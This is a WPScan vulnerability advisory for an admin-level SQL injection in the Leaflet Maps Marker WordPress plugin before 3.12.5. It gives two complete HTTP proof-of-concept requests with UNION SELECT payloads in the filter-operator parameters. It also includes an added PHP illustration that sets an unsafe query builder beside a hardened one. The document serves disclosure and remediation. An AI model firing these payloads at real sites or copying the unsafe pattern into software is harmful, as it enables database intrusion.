wpvulndb | Ihor Bliumental | WPVDB-ID: 03E0D4D5-0184-4A15-B8AC-FDC2010E4812
Aug 08, 2022 - 12:00 a.m.

Leaflet Maps Marker < 3.12.5 - Admin+ SQLi

2022-08-08 00:00:00
Ihor Bliumental
wpscan.com
9

EPSS: 0.001 (Low), percentile 37.9%

The plugin does not properly sanitize some parameters before inserting them into SQL queries. As a result, high-privilege users (Admin+) could perform SQL injection attacks.

PoC

PoC for filter-operator1 parameter:

POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 476
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=NOT_FOUND&filter-operator1=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-popuptext=1&filter-exclude-markername=&filter-operator2=AND&filter-exclude-popuptext=&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export

======

PoC for filter-operator2 parameter:

POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 474
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=&filter-operator1=&filter-popuptext=1&filter-exclude-markername=1&filter-operator2=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-exclude-popuptext=NOT_FOUND&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export
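Added illustration, not code from the Leaflet Maps Marker plugin (the advisory does not show the plugin's source): a hypothetical export-filter builder that shows the weak pattern described above, a request-supplied operator concatenated into the SQL text, beside a hardened version that allowlists the operator and binds the remaining values with $wpdb->prepare(). Function names and the markername/popuptext column names are assumptions; the request keys are the ones from the PoC.

```php
<?php
// Added illustration; hypothetical helper names, not the plugin's own code.
// $wpdb is the WordPress database object; column names are assumed.

// Weak pattern: the operator from the request lands in the SQL string
// unchanged, so a value that closes the parenthesis and appends a
// UNION rewrites the query even though the text values were escaped.
function build_export_where_unsafe( array $req ) {
    $name = esc_sql( $req['filter-markername'] ?? '' );
    $text = esc_sql( $req['filter-popuptext'] ?? '' );
    $op   = $req['filter-operator1'] ?? 'AND';   // never validated
    return "WHERE (markername LIKE '%{$name}%' {$op} popuptext LIKE '%{$text}%')";
}

// Hardened: an operator is an SQL keyword, not data, so it is chosen from a
// fixed allowlist and anything else falls back to the default. The text
// values go through prepare() placeholders and esc_like() so that % and _
// in user input are matched literally. filter-operator2 gets the same treatment.
function build_export_where_safe( $wpdb, array $req ) {
    $allowed = array( 'AND', 'OR' );
    $op = strtoupper( trim( (string) ( $req['filter-operator1'] ?? 'AND' ) ) );
    if ( ! in_array( $op, $allowed, true ) ) {
        $op = 'AND';                              // reject unknown operators
    }
    $name = '%' . $wpdb->esc_like( (string) ( $req['filter-markername'] ?? '' ) ) . '%';
    $text = '%' . $wpdb->esc_like( (string) ( $req['filter-popuptext'] ?? '' ) ) . '%';
    // $op is interpolated only after allowlisting; user values are bound, not interpolated.
    return $wpdb->prepare(
        "WHERE (markername LIKE %s {$op} popuptext LIKE %s)",
        $name,
        $text
    );
}
```

The same allowlist check applies to every parameter that selects a keyword, sort column or direction rather than a value, since prepare() placeholders cannot bind those.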

CPE Name             Operator  Version
leaflet-maps-marker  lt        3.12.5

